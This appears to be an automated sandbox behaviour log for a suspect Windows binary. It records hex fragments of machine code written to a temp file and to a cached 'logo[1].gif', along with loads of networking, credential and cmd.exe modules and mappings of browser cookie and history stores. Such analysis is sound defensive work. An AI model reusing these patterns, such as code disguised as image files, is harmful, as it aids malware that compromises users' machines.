C:\WINDOWS\Temp\pac_00603.tmp	none	514	14 08 74 62 8B 45 F0 39 47 0C 75 5A 57 FF 75 28 FF 75 14 FF 75 10 E8 57 00 00 00 84 C0 0F 84 E6 7D 01 00 FF 75 2C 8B 46 0C FF 75 28 89 45 20 8B 5E 08 33 C0 40 50 FF 75 24 89 45 F8 8B 45 0C 56 FF 75 1C FF 75 18 FF 70 04 FF 77 04 FF 75 14 FF 75 10 57 FF 55 08 85 C0 75 03 21 45 F4 8B 45 20 89 5E 08 89	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	DC 66 8B 46 02 66 89 45 E4 FF D3 83 3D 9C 96 05 00 00 88 45 28 0F 85 E9 B0 02 00 80 7D 2C 00 0F 84 56 BC 00 00 FF 75 0C FF 15 00 98 05 00 6A 00 FF 75 08 88 45 2F FF 15 48 98 05 00 89 45 18 8D 45 EC 50 33 C0 66 8B 46 02 6A 11 50 FF 75 14 E8 71 04 00 00 85 C0 89 45 08 0F 84 E3 A3 01 00 80 7D 2F 05 0F	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	DC 66 8B 46 02 66 89 45 E4 FF D3 83 3D 9C 96 05 00 00 88 45 28 0F 85 E9 B0 02 00 80 7D 2C 00 0F 84 56 BC 00 00 FF 75 0C FF 15 00 98 05 00 6A 00 FF 75 08 88 45 2F FF 15 48 98 05 00 89 45 18 8D 45 EC 50 33 C0 66 8B 46 02 6A 11 50 FF 75 14 E8 71 04 00 00 85 C0 89 45 08 0F 84 E3 A3 01 00 80 7D 2F 05 0F	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	08 0F B6 40 08 89 4D D8 89 45 C4 0F 85 B5 7B 01 00 8D 45 D4 50 8B 45 C8 8B 48 08 8B 40 0C 83 C1 08 51 8D 4D CC 51 8B 4D 18 83 C1 F8 51 83 E8 08 50 FF 75 DC 8D 45 E4 FF 75 D8 FF 75 C4 50 6A 16 56 FF 55 A4 80 7D E3 00 8B F0 0F 85 90 7A 01 00 81 FE 16 00 00 C0 0F 84 64 FE 00 00 A1 84 44 05 00 85 C0 0F	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	08 0F B6 40 08 89 4D D8 89 45 C4 0F 85 B5 7B 01 00 8D 45 D4 50 8B 45 C8 8B 48 08 8B 40 0C 83 C1 08 51 8D 4D CC 51 8B 4D 18 83 C1 F8 51 83 E8 08 50 FF 75 DC 8D 45 E4 FF 75 D8 FF 75 C4 50 6A 16 56 FF 55 A4 80 7D E3 00 8B F0 0F 85 90 7A 01 00 81 FE 16 00 00 C0 0F 84 64 FE 00 00 A1 84 44 05 00 85 C0 0F	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	74 45 F6 46 25 02 0F 85 9C E9 FF FF 8B 46 2C 3B C7 75 34 66 8B 4D 0C 66 39 4E 30 75 2A 38 5E 32 75 25 83 BE 44 01 00 00 00 0F 85 70 9C 01 00 8B C6 5F 5E 5B 5D C2 14 00 33 C0 EB F5 85 FF 74 F8 33 FF 21 7D 14 EB 93 8B 36 EB A2 90 90 90 90 90 8B FF 55 8B EC 0F B6 45 10 0F B7 4D 0C C1 E0 10 0B C1 03 45	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	74 45 F6 46 25 02 0F 85 9C E9 FF FF 8B 46 2C 3B C7 75 34 66 8B 4D 0C 66 39 4E 30 75 2A 38 5E 32 75 25 83 BE 44 01 00 00 00 0F 85 70 9C 01 00 8B C6 5F 5E 5B 5D C2 14 00 33 C0 EB F5 85 FF 74 F8 33 FF 21 7D 14 EB 93 8B 36 EB A2 90 90 90 90 90 8B FF 55 8B EC 0F B6 45 10 0F B7 4D 0C C1 E0 10 0B C1 03 45	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	CE FF 15 08 EF 04 00 5E 5B 5D C2 08 00 90 90 90 90 90 8B FF 55 8B EC 81 EC 10 01 00 00 A1 84 F4 04 00 89 45 FC 8B 45 08 89 85 34 FF FF FF 8B 45 10 89 45 98 8B 45 24 53 33 DB FF 05 A4 F7 04 00 89 85 48 FF FF FF 8B 45 2C 56 8B 75 20 89 85 28 FF FF FF 8A 46 0C 24 01 57 8B 7D 0C 89 75 8C 89 5D 90 89 9D	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	CE FF 15 08 EF 04 00 5E 5B 5D C2 08 00 90 90 90 90 90 8B FF 55 8B EC 81 EC 10 01 00 00 A1 84 F4 04 00 89 45 FC 8B 45 08 89 85 34 FF FF FF 8B 45 10 89 45 98 8B 45 24 53 33 DB FF 05 A4 F7 04 00 89 85 48 FF FF FF 8B 45 2C 56 8B 75 20 89 85 28 FF FF FF 8A 46 0C 24 01 57 8B 7D 0C 89 75 8C 89 5D 90 89 9D	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	02 00 8B 8D 78 FF FF FF FF 15 0C EF 04 00 80 7F 10 07 88 45 A7 0F 84 84 0E 02 00 89 9D 6C FF FF FF 8A 55 A7 8B 8D 78 FF FF FF FF 15 08 EF 04 00 8B 45 B4 89 58 08 8B 45 B4 88 58 1C 8B 45 8C F6 40 0C 01 0F 85 2E 11 02 00 8D 45 AC 50 E8 0C 09 00 00 8B F0 3B F3 89 B5 50 FF FF FF 0F 84 72 26 02 00 6A 10	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	02 00 8B 8D 78 FF FF FF FF 15 0C EF 04 00 80 7F 10 07 88 45 A7 0F 84 84 0E 02 00 89 9D 6C FF FF FF 8A 55 A7 8B 8D 78 FF FF FF FF 15 08 EF 04 00 8B 45 B4 89 58 08 8B 45 B4 88 58 1C 8B 45 8C F6 40 0C 01 0F 85 2E 11 02 00 8D 45 AC 50 E8 0C 09 00 00 8B F0 3B F3 89 B5 50 FF FF FF 0F 84 72 26 02 00 6A 10	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	45 90 8B 4D 90 3B CB 89 4E 18 89 4D A0 0F 84 8A 12 02 00 F6 81 B4 00 00 00 08 0F 85 D6 12 02 00 89 5E 28 8B 45 8C F6 40 0C 01 75 16 F6 81 B4 00 00 00 04 0F 85 2D 13 02 00 8B 45 AC 8B 4D 1C 89 48 0C FF 75 18 E8 95 DD FF FF 88 85 5C FF FF FF 8B 45 8C F6 40 0C 01 75 08 39 18 0F 85 AF 2D 00 00 39 5D 80	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	45 90 8B 4D 90 3B CB 89 4E 18 89 4D A0 0F 84 8A 12 02 00 F6 81 B4 00 00 00 08 0F 85 D6 12 02 00 89 5E 28 8B 45 8C F6 40 0C 01 75 16 F6 81 B4 00 00 00 04 0F 85 2D 13 02 00 8B 45 AC 8B 4D 1C 89 48 0C FF 75 18 E8 95 DD FF FF 88 85 5C FF FF FF 8B 45 8C F6 40 0C 01 75 08 39 18 0F 85 AF 2D 00 00 39 5D 80	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	FF FF FF 8B 00 3B C3 89 85 7C FF FF FF 0F 85 6D FF FF FF 89 1E 8B 7D B4 83 C7 38 89 9D 68 FF FF FF 89 7D 84 FF 15 04 EF 04 00 88 45 A7 8D 85 08 FF FF FF 50 E8 E2 E5 FF FF 89 85 7C FF FF FF 8B 85 08 FF FF FF 8B 70 04 3B F0 74 5B 38 9D 57 FF FF FF 89 9D 68 FF FF FF 0F 85 A2 12 02 00 8D 85 68 FF FF FF	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	FF FF FF 8B 00 3B C3 89 85 7C FF FF FF 0F 85 6D FF FF FF 89 1E 8B 7D B4 83 C7 38 89 9D 68 FF FF FF 89 7D 84 FF 15 04 EF 04 00 88 45 A7 8D 85 08 FF FF FF 50 E8 E2 E5 FF FF 89 85 7C FF FF FF 8B 85 08 FF FF FF 8B 70 04 3B F0 74 5B 38 9D 57 FF FF FF 89 9D 68 FF FF FF 0F 85 A2 12 02 00 8D 85 68 FF FF FF	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	02 00 8B 85 0C FF FF FF 01 45 14 80 BD 5C FF FF FF 01 0F 84 49 E2 00 00 8B 45 88 8B 4D 14 03 C1 3B 85 60 FF FF FF 0F 87 E8 1B 02 00 8B 45 AC 38 58 08 0F 84 FE 1F 02 00 8B 85 28 FF FF FF 3B C3 74 06 8B 4D 90 89 48 40 39 1D DC 13 05 00 6A 01 FF B5 3C FF FF FF 0F 95 C0 50 FF 75 88 FF 75 A8 FF 75 AC 57	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	02 00 8B 85 0C FF FF FF 01 45 14 80 BD 5C FF FF FF 01 0F 84 49 E2 00 00 8B 45 88 8B 4D 14 03 C1 3B 85 60 FF FF FF 0F 87 E8 1B 02 00 8B 45 AC 38 58 08 0F 84 FE 1F 02 00 8B 85 28 FF FF FF 3B C3 74 06 8B 4D 90 89 48 40 39 1D DC 13 05 00 6A 01 FF B5 3C FF FF FF 0F 95 C0 50 FF 75 88 FF 75 A8 FF 75 AC 57	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	45 F8 8B 46 60 0F 95 45 0F 81 7D 10 01 00 00 C0 57 8B 7E 44 89 4D F0 89 45 FC 0F 84 48 F1 01 00 83 65 10 00 0F B7 46 1E 8D 44 30 20 8B 40 08 85 C0 0F 85 3D F1 01 00 85 FF 0F 85 3D F1 01 00 FF 75 10 6A 01 56 E8 7A FE FF FF 85 C0 74 29 FF 75 10 50 FF 75 F0 FF 55 EC 83 7D FC 00 0F 85 B3 F1 01 00 83 7D	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	45 F8 8B 46 60 0F 95 45 0F 81 7D 10 01 00 00 C0 57 8B 7E 44 89 4D F0 89 45 FC 0F 84 48 F1 01 00 83 65 10 00 0F B7 46 1E 8D 44 30 20 8B 40 08 85 C0 0F 85 3D F1 01 00 85 FF 0F 85 3D F1 01 00 FF 75 10 6A 01 56 E8 7A FE FF FF 85 C0 74 29 FF 75 10 50 FF 75 F0 FF 55 EC 83 7D FC 00 0F 85 B3 F1 01 00 83 7D	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	0C FF 35 38 3E 05 00 E8 A2 01 00 00 85 C0 74 07 0F B6 4D 10 89 48 14 5D C2 0C 00 80 7D 10 60 77 F6 E9 D3 9A 01 00 90 90 90 90 90 8B FF 55 8B EC 51 51 8B 45 0C 83 65 F8 00 8B 00 57 8B 7D 08 80 7F 6A 00 89 45 FC 0F 85 A3 A4 01 00 53 56 8D 4F 20 FF 15 0C EF 04 00 8B 5D 18 85 DB 88 45 0C 0F 85 94 A4 01	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	0C FF 35 38 3E 05 00 E8 A2 01 00 00 85 C0 74 07 0F B6 4D 10 89 48 14 5D C2 0C 00 80 7D 10 60 77 F6 E9 D3 9A 01 00 90 90 90 90 90 8B FF 55 8B EC 51 51 8B 45 0C 83 65 F8 00 8B 00 57 8B 7D 08 80 7F 6A 00 89 45 FC 0F 85 A3 A4 01 00 53 56 8D 4F 20 FF 15 0C EF 04 00 8B 5D 18 85 DB 88 45 0C 0F 85 94 A4 01	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	3B 4E 10 0F 87 D2 00 00 00 8B 3E 3B FE 0F 84 1E 0F 00 00 83 C7 FC 8D 4F 10 FF 15 DC EF 04 00 85 C0 0F 84 8D 0E 00 00 8B D8 8B CF B8 00 F0 FF FF 23 C8 3B F9 0F 85 22 A3 02 00 3B 37 0F 85 1A A3 02 00 66 83 7F 0E 00 0F 85 0F A3 02 00 8B CB 23 C8 3B CF 0F 85 03 A3 02 00 66 83 7F 14 00 0F 84 37 FE FF FF	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	3B 4E 10 0F 87 D2 00 00 00 8B 3E 3B FE 0F 84 1E 0F 00 00 83 C7 FC 8D 4F 10 FF 15 DC EF 04 00 85 C0 0F 84 8D 0E 00 00 8B D8 8B CF B8 00 F0 FF FF 23 C8 3B F9 0F 85 22 A3 02 00 3B 37 0F 85 1A A3 02 00 66 83 7F 0E 00 0F 85 0F A3 02 00 8B CB 23 C8 3B CF 0F 85 03 A3 02 00 66 83 7F 14 00 0F 84 37 FE FF FF	success or wait	1	40FFDF

Other file operations
File Path	Disposition	Data	Ascii Data	Completion	Count	Source Address
C:\binary.exe	BasicInformation	Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: archive and temporary		success or wait	1	407757

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	260000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	280000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	2D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	320000	24576	own pid	readonly	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
\KnownDlls\MPR.dll	write and read and execute	image	71B20000	73728	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
C:\WINDOWS\system32\iphlpapi.dll	query and write and read and execute	image	76D60000	102400	own pid	read write	success or wait	1
\KnownDlls\WININET.dll	write and read and execute	image	3D930000	942080	own pid	read write	success or wait	1
\KnownDlls\Normaliz.dll	write and read and execute	image	330000	36864	own pid	read write	image not at base	1
\KnownDlls\Normaliz.dll	write and read and execute	image	330000	36864	own pid	read write	conflicting addresses	1
\KnownDlls\urlmon.dll	write and read and execute	image	78130000	1257472	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
\KnownDlls\iertutil.dll	write and read and execute	image	3DFD0000	2002944	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
C:\WINDOWS\system32\mfc42.dll	query and write and read and execute	image	73DD0000	987136	own pid	read write	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	340000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	370000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	970000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	970000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	390000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	390000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	970000	618496	own pid	readonly	success or wait	1
C:\WINDOWS\system32\msapsspc.dll	query and write and read and execute	image	71E50000	86016	own pid	read write	success or wait	1
C:\WINDOWS\system32\msvcrt40.dll	query and write and read and execute	image	78080000	69632	own pid	read write	success or wait	2
C:\WINDOWS\system32\schannel.dll	query and write and read and execute	image	767F0000	163840	own pid	read write	success or wait	1
C:\WINDOWS\system32\crypt32.dll	query and write and read and execute	image	77A80000	610304	own pid	read write	success or wait	2
C:\WINDOWS\system32\msasn1.dll	query and write and read and execute	image	77B20000	73728	own pid	read write	success or wait	2
C:\WINDOWS\system32\digest.dll	query and write and read and execute	image	75B00000	86016	own pid	read write	success or wait	1
C:\WINDOWS\system32\msnsspc.dll	query and write and read and execute	image	747B0000	290816	own pid	read write	success or wait	1
C:\WINDOWS\system32\msv1_0.dll	write and read and execute	commit	1450000	139264	own pid	execute	success or wait	1
C:\WINDOWS\system32\msv1_0.dll	query and write and read and execute	image	77C70000	151552	own pid	read write	success or wait	1
C:\WINDOWS\system32\cryptdll.dll	query and write and read and execute	image	76790000	49152	own pid	read write	success or wait	1
C:\WINDOWS\system32\dhcpcsvc.dll	query and write and read and execute	image	7D4B0000	139264	own pid	read write	success or wait	1
C:\WINDOWS\system32\netman.dll	query and write and read and execute	image	77D00000	208896	own pid	read write	success or wait	1
C:\WINDOWS\system32\mprapi.dll	query and write and read and execute	image	76D40000	98304	own pid	read write	success or wait	1
C:\WINDOWS\system32\activeds.dll	query and write and read and execute	image	77CC0000	204800	own pid	read write	success or wait	1
C:\WINDOWS\system32\adsldpc.dll	query and write and read and execute	image	76E10000	151552	own pid	read write	success or wait	1
C:\WINDOWS\system32\atl.dll	query and write and read and execute	image	76B20000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\samlib.dll	query and write and read and execute	image	71BF0000	77824	own pid	read write	success or wait	1
C:\WINDOWS\system32\setupapi.dll	query and write and read and execute	image	77920000	995328	own pid	read write	success or wait	1
C:\WINDOWS\system32\netshell.dll	query and write and read and execute	image	76400000	1724416	own pid	read write	success or wait	1
C:\WINDOWS\system32\credui.dll	query and write and read and execute	image	76C00000	188416	own pid	read write	success or wait	1
C:\WINDOWS\system32\dot3api.dll	query and write and read and execute	image	478C0000	40960	own pid	read write	success or wait	1
C:\WINDOWS\system32\dot3dlg.dll	query and write and read and execute	image	736D0000	24576	own pid	read write	success or wait	1
C:\WINDOWS\system32\onex.dll	query and write and read and execute	image	5DCA0000	163840	own pid	read write	success or wait	1
C:\WINDOWS\system32\wtsapi32.dll	query and write and read and execute	image	76F50000	32768	own pid	read write	success or wait	1
C:\WINDOWS\system32\winsta.dll	query and write and read and execute	image	76360000	65536	own pid	read write	success or wait	1
C:\WINDOWS\system32\eappcfg.dll	query and write and read and execute	image	745B0000	139264	own pid	read write	success or wait	1
C:\WINDOWS\system32\msvcp60.dll	query and write and read and execute	image	76080000	413696	own pid	read write	success or wait	1
C:\WINDOWS\system32\eappprxy.dll	query and write and read and execute	image	5DCD0000	57344	own pid	read write	success or wait	1
C:\WINDOWS\system32\wzcsapi.dll	query and write and read and execute	image	73030000	65536	own pid	read write	success or wait	1
C:\WINDOWS\system32\wzcsvc.dll	query and write and read and execute	image	7DB10000	573440	own pid	read write	success or wait	1
C:\WINDOWS\system32\wmi.dll	query and write and read and execute	image	76D30000	16384	own pid	read write	success or wait	1
C:\WINDOWS\system32\eapolqec.dll	query and write and read and execute	image	72810000	45056	own pid	read write	success or wait	1
C:\WINDOWS\system32\qutil.dll	query and write and read and execute	image	726C0000	90112	own pid	read write	success or wait	1
C:\WINDOWS\system32\esent.dll	query and write and read and execute	image	606B0000	1101824	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	1470000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	1470000	4096	own pid	readonly	success or wait	2
\BaseNamedObjects\AtlDebugAllocator_FileMappingNameStatic3_2e4	query and write and read	reserve	18E0000	4194304	own pid	read write	success or wait	1
\BaseNamedObjects\AtlDebugAllocator_FileMappingNameStatic3_2e4	query and write and read	reserve	1D20000	4194304	own pid	read write	success or wait	1
C:\WINDOWS\system32\netshell.dll	read	commit	1D20000	1703936	own pid	readonly	success or wait	1
\BaseNamedObjects\AtlDebugAllocator_FileMappingNameStatic3_2e4	query and write and read	reserve	1D60000	4194304	own pid	read write	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768	write	image	3F0000	32768	own pid	read write	success or wait	1	87D83EC
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_Cookies_index.dat_16384	write	image	BF0000	16384	own pid	read write	success or wait	1	87D83EC
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_Local Settings_History_History.IE5_index.dat_16384	write	image	C00000	16384	own pid	read write	success or wait	1	87D83EC
C:\WINDOWS\system32\icmp.dll	query and write and read and execute	image	74290000	16384	own pid	read write	success or wait	1	4095FB
C:\WINDOWS\system32\dnsapi.dll	query and write and read and execute	image	76F20000	159744	own pid	read write	success or wait	1	409765
C:\WINDOWS\system32\odbc32.dll	query and write and read and execute	image	74320000	249856	own pid	read write	success or wait	1	4098F6
\KnownDlls\comdlg32.dll	write and read and execute	image	763B0000	299008	own pid	read write	success or wait	1	4098F6
C:\WINDOWS\system32\odbcint.dll	write and read and execute	commit	D10000	94208	own pid	execute	success or wait	1	4098F6
C:\WINDOWS\system32\odbcint.dll	query and write and read and execute	image	D10000	94208	own pid	read write	image not at base	1	4098F6
C:\WINDOWS\system32\odbcint.dll	query and write and read and execute	image	D10000	94208	own pid	read write	conflicting addresses	1	4098F6
C:\WINDOWS\system32\psapi.dll	query and write and read and execute	image	76BF0000	45056	own pid	read write	success or wait	1	409994
\BaseNamedObjects\ShimSharedMemory	write	image	D30000	57344	own pid	read write	success or wait	1	40B100
C:\WINDOWS\system32\apphelp.dll	write and read and execute	commit	D40000	126976	own pid	execute	success or wait	1	40B100
C:\WINDOWS\system32\apphelp.dll	query and write and read and execute	image	77B40000	139264	own pid	read write	success or wait	1	40B100
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	D40000	1208320	own pid	readonly	success or wait	4	40B100
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1	40B100
C:\WINDOWS\system32\cmd.exe	write and read and execute	commit	E70000	389120	own pid	execute	success or wait	6	40B100
C:\WINDOWS\system32\cmd.exe	query and read	commit	E70000	389120	own pid	readonly	success or wait	6	40B100
C:\WINDOWS\system32\mswsock.dll	write and read and execute	commit	1040000	245760	own pid	execute	success or wait	1	40B04D
C:\WINDOWS\system32\mswsock.dll	query and write and read and execute	image	71A50000	258048	own pid	read write	success or wait	1	40B04D
C:\WINDOWS\system32\winrnr.dll	write and read and execute	commit	1040000	20480	own pid	execute	success or wait	1	40B04D
C:\WINDOWS\system32\winrnr.dll	query and write and read and execute	image	76FB0000	32768	own pid	read write	success or wait	1	40B04D
\KnownDlls\WLDAP32.dll	write and read and execute	image	76F60000	180224	own pid	read write	success or wait	1	40B04D
C:\WINDOWS\system32\rasadhlp.dll	query and write and read and execute	image	76FC0000	24576	own pid	read write	success or wait	1	40B05D
C:\WINDOWS\system32\rasapi32.dll	query and write and read and execute	image	76EE0000	245760	own pid	read write	success or wait	1	408A58
C:\WINDOWS\system32\rasman.dll	query and write and read and execute	image	76E90000	73728	own pid	read write	success or wait	1	408A58
C:\WINDOWS\system32\tapi32.dll	query and write and read and execute	image	76EB0000	192512	own pid	read write	success or wait	1	408A58
C:\WINDOWS\system32\rtutils.dll	query and write and read and execute	image	76E80000	57344	own pid	read write	success or wait	1	408A58
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1	408A58
C:\WINDOWS\system32\tapi32.dll	read	commit	1450000	184320	own pid	readonly	success or wait	1	408A58
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1	408A58
C:\WINDOWS\system32\sensapi.dll	query and write and read and execute	image	722B0000	20480	own pid	read write	success or wait	1	408A58
\BaseNamedObjects\SENS Information Cache	read	image	1450000	4096	own pid	readonly	success or wait	1	408A58
C:\WINDOWS\system32\en-us\wininet.dll.mui	query and read	commit	1460000	53248	own pid	write copy	success or wait	1	408A58
C:\WINDOWS\system32\hnetcfg.dll	query and write and read and execute	image	662B0000	360448	own pid	read write	success or wait	1	407DC6
C:\WINDOWS\system32\wshtcpip.dll	write and read and execute	commit	1470000	20480	own pid	execute	success or wait	1	407DC6
C:\WINDOWS\system32\wshtcpip.dll	query and write and read and execute	image	71A90000	32768	own pid	read write	success or wait	1	407DC6
none	query and write and read	commit	1790000	12288	own pid	read write	success or wait	2	415677
none	query and write and read	commit	1470000	12288	own pid	read write	success or wait	22	41568D
unknown	unknown	unknown	2060000	4096	own pid	readonly	success or wait	1	40FF50
unknown	unknown	unknown	2070000	4096	own pid	readonly	success or wait	1	40FF50
C:\WINDOWS\system32\rpcss.dll	write and read and execute	commit	2080000	401408	own pid	execute	success or wait	1	40FF50
C:\WINDOWS\system32\clbcatq.dll	query and write and read and execute	image	76FD0000	520192	own pid	read write	success or wait	1	40FF50
C:\WINDOWS\system32\comres.dll	query and write and read and execute	image	77050000	806912	own pid	read write	success or wait	1	40FF50
C:\WINDOWS\system32\msxml3.dll	write and read and execute	commit	2090000	1175552	own pid	execute	success or wait	1	40FF50
C:\WINDOWS\system32\msxml3.dll	query and write and read and execute	image	74980000	1191936	own pid	read write	success or wait	2	40FF50
C:\WINDOWS\system32\msxml3r.dll	write and read and execute	commit	2560000	45056	own pid	execute	success or wait	1	40FF50
C:\WINDOWS\system32\msxml3r.dll	query and read	commit	2560000	45056	own pid	readonly	success or wait	1	40FF50
C:\WINDOWS\system32\msxml3.dll	write and read and execute	commit	2190000	1175552	own pid	execute	success or wait	1	40FF50
C:\WINDOWS\system32\msxml3r.dll	write and read and execute	commit	2660000	45056	own pid	execute	success or wait	1	40FF50
C:\WINDOWS\system32\msxml3r.dll	query and read	commit	2660000	45056	own pid	readonly	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_16384	query and write and read	commit	2690000	16384	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_32768	query and write and read	commit	2690000	32768	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_49152	query and write and read	commit	2690000	49152	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_65536	query and write and read	commit	2690000	65536	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_81920	query and write and read	commit	2690000	81920	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_98304	query and write and read	commit	2690000	98304	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_114688	query and write and read	commit	2690000	114688	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_131072	query and write and read	commit	2690000	131072	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_147456	query and write and read	commit	2690000	147456	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_163840	query and write and read	commit	2690000	163840	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_180224	query and write and read	commit	2690000	180224	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_196608	query and write and read	commit	2690000	196608	own pid	read write	success or wait	1	40FF50
\BaseNamedObjects\Local\C:_Documents and Settings_LocalService_IETldCache_index.dat_212992	query and write and read	commit	2690000	212992	own pid	read write	success or wait	1	40FF50
